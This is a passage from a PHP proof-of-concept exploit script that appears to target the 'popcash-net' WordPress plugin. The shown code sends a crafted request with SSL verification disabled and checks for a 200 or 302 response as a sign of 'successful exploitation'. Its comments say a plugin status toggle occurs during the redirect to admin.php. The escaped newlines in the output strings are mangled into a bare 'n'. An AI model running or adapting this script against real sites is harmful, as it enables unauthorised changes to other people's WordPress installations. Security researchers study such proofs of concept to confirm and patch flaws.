curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for successful exploitation
if ($http_code == 200 || $http_code == 302) {
    echo "[+] Vulnerability may be exploitablen";
    echo "[+] Request sent to: $exploit_urln";
    echo "[+] HTTP Response Code: $http_coden";
    
    // Note: Successful exploitation typically redirects to admin.php
    // The plugin status toggle occurs during the redirect
    if (strpos($response, 'popcash-net') !== false) {
        echo "[+] Plugin admin page detected in responsen";
    }
} else {
    echo "[-] Request failed or target may be patchedn";
    echo "[-] HTTP Response Code: $http_coden";
}

curl_close($ch);

?>